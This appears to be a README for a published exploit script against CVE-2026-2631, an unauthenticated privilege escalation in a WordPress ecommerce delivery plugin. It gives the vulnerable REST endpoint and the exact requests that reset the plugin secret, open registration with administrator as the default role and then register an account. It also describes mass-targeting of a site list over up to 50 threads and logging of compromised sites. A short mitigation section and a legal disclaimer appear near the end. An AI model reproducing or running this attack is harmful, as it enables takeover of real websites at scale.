## https://sploitus.com/exploit?id=9289DF81-A1A8-54E1-8613-B52151B747CB
# CVE-2026-2631
Datalogics Ecommerce Delivery β Datalogics < 2.6.60 - Unauthenticated Privilege Escalation
# π₯ CVE-2026-2631 β Datalogics Ecommerce Delivery (WordPress) β Unauthenticated Privilege Escalation
> **PoC / Exploit Script:** `CVE-2026-2631.py`
> **Author:** Khaled Alenazi (Nxploited) β Nxploited ZeroDay Hub
> **Contact:** Telegram: `@Kxploit`
---
## 𧬠Vulnerability Overview
- **Plugin:** Datalogics Ecommerce Delivery β Datalogics (WordPress)
- **Affected Versions:** ``
- Looks for response text:
- `app secret key has been updated successfully`
3. **Update WordPress Options**
- Same endpoint, with:
- `action = createUpdateOption`
- Two option updates:
1. `option_key = users_can_register`, `option_value = 1`
2. `option_key = default_role`, `option_value = administrator`
- Success pattern:
- `wordpress option has been created or updated successfully`
4. **Check if Registration is Open**
- URL:
`/wp-login.php?action=register`
- Checks HTML for:
- `Users can register`, `Anyone can register`, `user_registration`, `registerform`
- Or detects explicit:
- `user registration is currently not allowed`
5. **Attempt User Registration**
- Same register URL.
- Extracts `_wpnonce` from hidden input if present.
- Sends registration POST:
- `user_login`, `user_email`
- `user_pass`/`user_pass2` if password fields exist
- `_wpnonce`, `_wp_http_referer`, `redirect_to`, `wp-submit=Register`
- Detects success by:
- `registration complete`, `check your email`, `user registered`
- If username already exists:
- Marks as success: `user_already_exists`
6. **Logging**
- Every successful option update (with or without registration success) writes a line to:
- `Login_admin.txt`
- Format:
```text
| register_url: | shop_secret: |
```
---
## π§΅ Multithreading Model
- Reads all targets from `list.txt` (or custom file).
- Splits targets into `N` chunks using `chunkify`.
- Launches `N` worker threads, each processing its own list of targets.
- Uses a shared `Queue` for status messages to the printer thread.
- A dedicated **printer thread** (`printer_loop`) updates a live `rich` table:
- Shows index, site, status (SUCCESS/FAILED/ERROR), and detail.
- Displays total processed and output filename.
---
## π Usage
### 1οΈβ£ Basic Run
```bash
python3 CVE-2026-2631.py
```
Youβll be interactively prompted for:
1. **Targets file**
- Prompt: `Targets file (one host/URL per line) [list.txt]:`
- Default: `list.txt`
- Each line: domain or full URL
- Examples:
- `victim.com`
- `https://target-site.com`
- `http://example.org/blog`
2. **Threads**
- Prompt: `Threads (1-50) [10]:`
- Default: `10`
- Max: `50`
More threads = faster, but higher load on your system and targets.
3. **shop_secret value**
- Prompt: `shop_secret [Nxploited_newSecret]:`
- Default: `Nxploited_newSecret`
This is the new secret key sent to `resetStoreConfigrations`.
4. **Registration credentials**
- `Registration username [Nx_test1]:`
- `Registration email [nxploited1@gmail.com]:`
- `Registration password [Nx_adminSA]:`
These creds will be used for the registration attempt on each vulnerable target.
---
### 2οΈβ£ Targets File Format
Create `list.txt` (or any file you want) with one target per line:
```text
example1.com
http://example2.com
https://shop.example3.net
blog.target-site.org
```
The script will:
- Auto-add `http://` if missing.
- Remove trailing `/`.
---
### 3οΈβ£ Output & Results
- All **successful** operations (even if user registration fails but options are set) are written to:
**`Login_admin.txt`**
- A typical line:
```text
http://example1.com | register_url: http://example1.com/wp-login.php?action=register | shop_secret: Nxploited_newSecret | reset_ok,option_ok,option_ok,register_open,registered user=Nx_test1 email=nxploited1@gmail.com pass=Nx_adminSA
```
- Examples of status in the live table:
- β `SUCCESS` β options set and/or user registered.
- β `FAILED` β reset/options failed, vulnerability not exploitable.
- β οΈ `ERROR` β Exception, network errors, timeouts, etc.
---
## π§± HTTP Endpoints & Parameters
### π Vulnerable REST Endpoint
```text
POST /wp-json/gsf/v1/update-options
```
#### 1. Reset `shop_secret`
```http
action=resetStoreConfigrations
shop_secret=
```
#### 2. Update Options
```http
action=createUpdateOption
shop_secret=
option_key=users_can_register
option_value=1
```
```http
action=createUpdateOption
shop_secret=
option_key=default_role
option_value=administrator
```
### π§βπ» Registration Endpoint
```text
GET/POST /wp-login.php?action=register
```
The script:
- Extracts `_wpnonce` if present.
- Sends registration data with the provided username, email, and password (if fields exist).
---
## π§ Script Internals (Key Functions)
- `normalize_site(raw: str) -> str`
Normalizes target URLs.
- `send_reset_secret(site: str, secret: str, timeout: int = 10) -> (bool, str)`
Tries the `resetStoreConfigrations` action.
- `send_option(site: str, secret: str, key: str, value: str, timeout: int = 10) -> (bool, str)`
Sets WordPress options via the vulnerable endpoint.
- `check_registration_open(site: str, timeout: int = 10) -> (bool, str)`
Checks if registration is open and form is accessible.
- `try_register_user(...) -> (bool, str)`
Attempts to register the supplied user.
- `write_success_line(site: str, secret: str, detail: str)`
Logs success details into `Login_admin.txt`.
- `worker(...)`
Per-thread worker that:
1. Resets `shop_secret`
2. Sets options
3. Checks registration
4. Attempts registration
5. Logs result and pushes status to queue
- `printer_loop(queue: Queue, total: int)`
Reads messages from the queue and updates a `rich` live table UI.
- `main()`
Orchestrates:
- Banner
- User prompts
- Target loading
- Thread spawning
- Joining and final message.
---
## π§ͺ Example Run (Interactive)
```text
$ python3 CVE-2026-2631.py
[Banner / ASCII Art]
Targets file (one host/URL per line) [list.txt]:
> list.txt
Threads (1-50) [10]:
> 20
shop_secret [Nxploited_newSecret]:
> NxSecret2026!
Registration username [Nx_test1]:
> admin_nx
Registration email [nxploited1@gmail.com]:
> admin@poc.local
Registration password [Nx_adminSA]:
> SuperStrongP@ss!
[Live table starts showing each targetβs status]
Processed 5/20 targets Β· Output: Login_admin.txt
Done. Successful sites (if any) saved to Login_admin.txt.
```
---
## π‘οΈ Mitigation & Recommendations
> **For Defenders / Site Owners:**
- π **Update the plugin** to version **2.6.60 or later** immediately.
- π§Ή Review:
- WordPress users list for unknown administrators.
- Recent registrations in `wp_users`.
- π Regenerate any secrets or keys used by the plugin.
- π Inspect access logs for hits to:
- `/wp-json/gsf/v1/update-options`
- `/wp-login.php?action=register`
- π§± Consider WAF rules to block unauthorized access to sensitive REST endpoints.
---
## β οΈ Legal Disclaimer
> **This script is provided strictly for educational and authorized security testing purposes only.**
- You **must not** use this tool on any system, application, or network **without explicit written permission** from the owner.
- Unauthorized access, exploitation, or abuse of vulnerabilities is **illegal** and may result in **criminal charges**.
- The author (**Khaled Alenazi β Nxploited**), contributors, and distributors of this script:
- β **Do NOT** assume any responsibility or liability for:
- Misuse of this code
- Damage caused directly or indirectly
- Any legal consequences resulting from its use
- By using this script, **you agree** that:
- You are solely responsible for your actions.
- You will comply with all applicable local, national, and international laws and regulations.
- You will use this tool **only** in controlled environments and/or with **proper authorization** (PT/Red Team, bug bounty, lab, etc.).
If you do not agree with these terms, **do not use this script.**
---
## β€οΈ Credits
- **Research & Exploit:**
- **Khaled Alenazi (Nxploited)** β Nxploited ZeroDay Hub
- **CVE:** `CVE-2026-2631`
- **Contact:** `@Kxploit` on Telegram
Stay safe, hack responsibly. πΆοΈπ»